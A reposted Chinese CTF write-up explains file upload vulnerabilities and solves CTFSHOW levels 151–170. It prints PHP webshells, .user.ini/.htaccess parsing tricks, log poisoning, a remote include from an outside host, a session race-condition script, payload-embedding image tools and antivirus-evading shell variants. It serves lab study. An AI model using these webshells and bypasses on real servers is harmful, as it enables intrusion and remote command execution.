【安全科普】一文读懂文件上传漏洞(附实战详解)
【安全科普】一文读懂文件上传漏洞(附实战详解)
学习网络安全到 开源聚合网络空间安全研究院 2024-05-29 16:48
网
安
教
育
培
养
网
络
安
全
人
才
技
术
交
流
、
学
习
咨
询
前言
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。
文件上传漏洞介绍
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
文件上传漏洞危害
上传文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码执行。
上传文件是病毒或者木马时,主要用于诱骗用户或者管理员下载执行或者直接 自劢运行;
上传文件是Flash的策略文件 crossdomain.xml,黑客用以控制Flash在该域 下的行为(其他通过类似方式控制策略文件的情况类似);
上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行;
上传文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。 除此之外,还有一些不常见的利用方法,比如将上传文件作为一个入口,溢 出服务器的后台处理程序,如图片解析模块;或者上传一个合法的文本文件,其内容包含了PHP脚本,再通过”本地文件包含漏洞(Local File Include)”执行此脚本。
文件上传漏洞满足条件
上传的后门文件,需要能被脚本语言解析执行。
说明一:对方服务器运行的PHP环境,你不能上传一个JAVA的后门代码。
说明二:你上传文件的目录可以被脚本语言解析执行,如果你上传的目录没有执行权限也不行
说明三:一般文件上传后会返回你一个地址,如果无妨链接到也不能构成文件上传漏洞。
还有例外情况,非脚本文件也能被成功解析。比如:上传了一个图片
🐎,如果对方中间件上存在一些漏洞的话,配合这些漏洞可以实现图片文件按照脚本文件解析。
文件检测流程
通常一个文件以HTTP协议进行上传时,将以POST请求发送至web服务器,web服务器接收到请求后并同意后,用户与web 服务器将建立连接,并传输data:
而一般一个文件上传过程中的检测如下图红色标记部分:
检测的内容一般有一下几个方面:
客户端 javascript 检测 (通常为检测文件扩展名)
服务端 MIME 类型检测 (检测 Content-Type 内容)
服务端目录路径检测 (检测跟 path 参数相关的内容)
服务端文件扩展名检测 (检测跟文件 extension 相关的内容)
服务端文件内容检测 (检测内容是否合法或含有恶意代码)
CTFSHOW 151关-170关
151关:前端验证绕过
前端代码,限制只允许上传图片。
修改png为php即可绕过前端校验。
最后会返回一个地址,使用蚁剑链接
读取flag
152关:后端校验 Content-Type 校验文件格式
前端修改,抓取上传数据包,并且修改 Content-Type
上传成功
后门链接读取flag
153关:filename字段文件后缀校验
按照刚刚提到的文件上传成因来说,如果加入了php后缀校验的话,路就被封死了。但还有另外一条路,就是非php文件后缀解析按照php进行解析。
文件后缀校验解决思路:引入 user.ini 文件
根据网上查到的信息,user.ini文件中有个字段 auto_prepend_file 它可以把指定文件文件加载到网站的首页,是根目录的首页。
我们可以得到的信息:通过这个字段可以把文件与你上传的目录首页文件一起加载,被php脚本执行解析。
由此我们得出结论,user.ini文件使用的限制条件:
1.上传.user.ini的目录必须有设置默认首页
2.php版本必须要在5以上
使用user.ini文件的好处:
1.可以突破文件后缀的检测
2.可以突破图片目录不给解析执行权限的限制
详细利用手法如下:
上传user.ini文件
上传后门图片文件
后门链接读取flag
154关:关键字过滤
手法和153关一样,不同点在在于增加了对图片内容的检测,检测图片的数据里有没有恶意的代码。经过尝试发现,过滤了php。
绕过方法:
//前提是开启配置参数short_open_tags=on
//不需要开启参数设置
<% echo ‘123’;%> //前提是开启配置参数asp_tags=on
//不需要修改参数开关
1构造payload:<?=eval($_POST[x]);?>
再次上传后门文件,读取flag即可
155关:关键字过滤
和上一关一模一样,不再赘述。
156关:过滤关键字
和第153关手法一样,结合上传 .user.ini 但是过滤的内容变了
经过尝试过滤的内容发现是 [] 绕过的手法可以参考第154关列举出来的方法
解决思路: [] == {}
1构造payload:<?=eval($_POST{x});?>
链接后门读取flag即可
157关:过滤关键字
和第153关手法一样,结合上传 .user.ini 但是过滤的内容变了
经过尝试发现过滤的 ; 与 [] ,分号一旦被过滤就意味着154关的四种过滤手法失效
解决思路:直接调用系统的命令
1构造payload:<?=system('tac ../flag.*')?>
直接访问upload命令就能看到结果
158关:过滤关键字
和157关一摸一样
159关:过滤关键字
和第153关手法一样,结合上传 .user.ini 但是过滤的内容变了
在上一关过滤的基础上,加入了对()的过滤,同时还过来了 flag.php
解决思路:使用反引号,结合通配符
1构造payload:<?=`tac ../fl*`?>
160关:日志文件包含
这一关连反引号都过滤了,1.png里面包含后门的全部失效。
Nginx一般会记录日志,日志会记录访问者的UA头,所以我们可以把后门代码写到UA头里面,然后利用.user.ini来包含日志文件,Nginx默认日志位置/var/log/nginx
首先上传文件.user.ini,在上传图片
图片中的内容
1<?=include"/var/lo"."g/nginx/access.lo"."g"?>
这时访问upload目录,得到了nginx日志信息
此时我们可以在UA头中写入后门代码。 将日志文件包含解析,我们将UA写入日志文件,进而解析后门代码
161关:文件头检测
加上了对文件头的检测,GIF89A,
解决思路:在上传的文件中加入,GIF89A,再延续160关的思路即可
162关:过滤.
这一关不仅是检测了文件头,也过滤了()、[]、{}、.这些,所以我们可以将.user.ini的内容写为
1GIF89a
2auto_prepend_file=png
我们可以远程包含文件,然后这个文件里面有一句话木马,这边需要用到IP转换地址,将IP转换为纯数字 网址:在线ip转int,ip转数字-BeJSON.com
1GIF89a
2<?=include'http://IP转换/文件名'>3
读取flag
163关:条件竞争
参考文章:利用session.upload_progress进行文件包含和反序列化渗透 – FreeBuf网络安全行业门户
如果网站的文件上传的过程是:服务器获取文件–>保存上传临时文件–>重命名移动临时文件 这样的步骤时,就可以通过不断地对文件进行上传和访问,从而使服务器还未重命名移动临时文件时,我们就利用时间差打开了文件,成功执行其中的恶意代码。
再php.ini中有以下几个选项目:
11. session.upload_progress.enabled = on
22. session.upload_progress.cleanup = on
33. session.upload_progress.prefix = "upload_progress_"
44. session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
55. session.use_strict_mode=off
这五个开启后,可以达到我们可以控制sessionid这个参数,并且可以创建session文件,我们就可以把恶意代码写入session文件中,在它被删除之前,通过不断发包访问来使session文件被包含。
1import requests
2import threading
3session=requests.session()
4sess='yu22x'
5url1="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/"
6url2="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/upload"
7data1={
8 'PHP_SESSION_UPLOAD_PROGRESS':'<?php system("tac ../f*");?>'
9}
10file={
11 'file':'toxicant'
12}
13cookies={
14 'PHPSESSID': sess
15}
16
17def write():
18 while True:
19 r = session.post(url1,data=data1,files=file,cookies=cookies)
20def read():
21 while True:
22 r = session.get(url2)
23 if 'flag' in r.text:
24 print(r.text)
25
26threads = [threading.Thread(target=write),
27 threading.Thread(target=read)]
28for t in threads:
29 t.start()
因为session文件名字,前半部分固定,后半部分是sessionid,这部分我们是可以控制的。开启两个线程,一个不断上传文件,另外一个不断访问触发,如果session文件成功被包含后,那么我们就可以访问成功,执行读取flag.php的代码,得到flag。
先上传.user.in文件
1GIF89a
2auto_prepend_file=png
再上传png,条件竞争的利用,还需要满足条件,知道对方session文件的目录。
1GIF89a
2<?=include"/tmp/sess_toxicant"?>
我这里的利用代码一直没跑出来结果,所以就暂且先放放。
164关:二次渲染
文件二次渲染:当你上传一个图片后,服务器会对图片进行处理,你的后门也就很可能被处理了
解决思路:使用脚本,有人分析了图片处理的规律,使用脚本可以把后门代码写入图片而不被处理
可以利用工具来将木马插入到图片中,工具代码如下,将代码放置到PHP环境中执行即可
1<?php 2$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 3 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 4 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 5 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 6 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 7 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 8 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 9 0x66, 0x44, 0x50, 0x33);1011$img = imagecreatetruecolor(32, 32);12for ($y = 0; $y < sizeof($p); $y += 3) {13 $r = $p[$y];14 $g = $p[$y+1];15 $b = $p[$y+2];16 $color = imagecolorallocate($img, $r, $g, $b);17 imagesetpixel($img, round($y / 3), 0, $color);18}19imagepng($img,'2.png'); //要修改的图片的路径20/* 木马内容21<?$_GET[0]($_POST[1]);?>22 */23?>
上传成功之后访问图片地址,在后面加入&0=system,1=tac flag.php,这个1=需要用POST方式提交
关于为什么这个图片能被php解析?
查看download.php的源代码
我们想要查看的图片被包含进入了download.php文件
165关:二次渲染
和上一关一个套路,只不过这次是jpg
1<?php
2$miniPayload = "<?=eval(\$_POST[1]);?>";
3
4if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
5 die('php-gd is not installed');
6}
7if(!isset($argv[1])) {
8 die('php jpg_payload.php <jpg_name.jpg>');
9}
10set_error_handler("custom_error_handler");
11for($pad = 0; $pad < 1024; $pad++) {
12 $nullbytePayloadSize = $pad;
13 $dis = new DataInputStream($argv[1]);
14 $outStream = file_get_contents($argv[1]);
15 $extraBytes = 0;
16 $correctImage = TRUE;
17
18 if($dis->readShort() != 0xFFD8) {
19 die('Incorrect SOI marker');
20 }
21 while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
22 $marker = $dis->readByte();
23 $size = $dis->readShort() - 2;
24 $dis->skip($size);
25 if($marker === 0xDA) {
26 $startPos = $dis->seek();
27 $outStreamTmp =
28 substr($outStream, 0, $startPos) .
29 $miniPayload .
30 str_repeat("\0",$nullbytePayloadSize) .
31 substr($outStream, $startPos);
32 checkImage('_'.$argv[1], $outStreamTmp, TRUE);
33 if($extraBytes !== 0) {
34 while((!$dis->eof())) {
35 if($dis->readByte() === 0xFF) {
36 if($dis->readByte !== 0x00) {
37 break;
38 }
39 }
40 }
41 $stopPos = $dis->seek() - 2;
42 $imageStreamSize = $stopPos - $startPos;
43 $outStream =
44 substr($outStream, 0, $startPos) .
45 $miniPayload .
46 substr(
47 str_repeat("\0",$nullbytePayloadSize).
48 substr($outStream, $startPos, $imageStreamSize),
49 0,
50 $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
51 substr($outStream, $stopPos);
52 } elseif($correctImage) {
53 $outStream = $outStreamTmp;
54 } else {
55 break;
56 }
57 if(checkImage('payload_'.$argv[1], $outStream)) {
58 die('Success!');
59 } else {
60 break;
61 }
62 }
63 }
64}
65unlink('payload_'.$argv[1]);
66die('Something\'s wrong');
67
68function checkImage($filename, $data, $unlink = FALSE) {
69 global $correctImage;
70 file_put_contents($filename, $data);
71 $correctImage = TRUE;
72 imagecreatefromjpeg($filename);
73 if($unlink)
74 unlink($filename);
75 return $correctImage;
76}
77
78function custom_error_handler($errno, $errstr, $errfile, $errline) {
79 global $extraBytes, $correctImage;
80 $correctImage = FALSE;
81 if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
82 if(isset($m[1])) {
83 $extraBytes = (int)$m[1];
84 }
85 }
86}
87
88class DataInputStream {
89 private $binData;
90 private $order;
91 private $size;
92
93 public function __construct($filename, $order = false, $fromString = false) {
94 $this->binData = '';
95 $this->order = $order;
96 if(!$fromString) {
97 if(!file_exists($filename) || !is_file($filename))
98 die('File not exists ['.$filename.']');
99 $this->binData = file_get_contents($filename);
100 } else {
101 $this->binData = $filename;
102 }
103 $this->size = strlen($this->binData);
104 }
105
106 public function seek() {
107 return ($this->size - strlen($this->binData));
108 }
109
110 public function skip($skip) {
111 $this->binData = substr($this->binData, $skip);
112 }
113
114 public function readByte() {
115 if($this->eof()) {
116 die('End Of File');
117 }
118 $byte = substr($this->binData, 0, 1);
119 $this->binData = substr($this->binData, 1);
120 return ord($byte);
121 }
122
123 public function readShort() {
124 if(strlen($this->binData) < 2) {
125 die('End Of File');
126 }
127 $short = substr($this->binData, 0, 2);
128 $this->binData = substr($this->binData, 2);
129 if($this->order) {
130 $short = (ord($short[1]) << 8) + ord($short[0]);
131 } else {
132 $short = (ord($short[0]) << 8) + ord($short[1]);
133 }
134 return $short;
135 }
136
137 public function eof() {
138 return !$this->binData||(strlen($this->binData) === 0);
139 }
140}
141?>
166关:上传zip格式
直接上传一个 shell.php ,内容为后门文件,链接即可。
这里也是对这个zip文件进行了文件包含,导致这个zip文件可以被加载。
167关:. htaccess文件绕过
.htaccess 默认不支持 nginx,设置后支持,默认支持Apache,.htaccess 可以通过设置实现nginx文件解析配置,将.png 后缀的文件解析成 php。
首先先上传 .htaccess 文件
1AddType application/x-httpd-php .jpg //htaccess文件内容
上传含有后门的图片
链接后门读取flag
168关:考验免杀
这个可以直接上传php文件,我们对payload进行处理,使其可以不被杀死
1payload1:
2<?php $a='syste';$b='m';$c=$a.$b;$c('tac ../flagaa.php');?> 3 4payload2: 5<?php 6$a = "s#y#s#t#e#m"; 7$b = explode("#",$a); 8$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5]; 9$c($_REQUEST[1]);10?>1112payload3:13<?php14$a=substr('1s',1).'ystem';15$a($_REQUEST[1]);16?>1718payload4:19<?php20$a=strrev('metsys');21$a($_REQUEST[1]);22?>23
上传后门文件
文件上传成功,链接后门读取flag
1http://3af2a636-8362-4c0b-9147-de822c7ddc9d.challenge.ctf.show/upload/test.php?1=cat ../flagaa.php
169关:日志包含
这一关上传了.user.ini之后,访问upload目录显示403,所以我们需要上传一个index.php,构造.user.ini利用条件:上传index.php 内容随意。上传.user.ini包含日志:auto_prepend_file=/var/log/nginx/access.log
访问地址带后门UA头写入日志:
这里其实和160的文件包含是一样的。只是我们需要上传index.php配合.user.ini
爆出403的错误就以为着当前目录的目录文件缺失。
170关:和169一摸一样
完结撒花!!!
END
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/qq_61553520/article/details/130218788
版权声明:著作权归作者所有。如有侵权请联系删除
网安训练营
网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!
加QQ(1005989737)找小姐姐私聊哦
精选文章
环境搭建
Python
学员专辑
信息收集
CNVD
安全求职
渗透实战
CVE
高薪揭秘
渗透测试工具
网络安全行业
神秘大礼包
基础教程
我们贴心备至
用户答疑
QQ在线客服
加入社群
QQ+微信等着你
我就知道你“在看”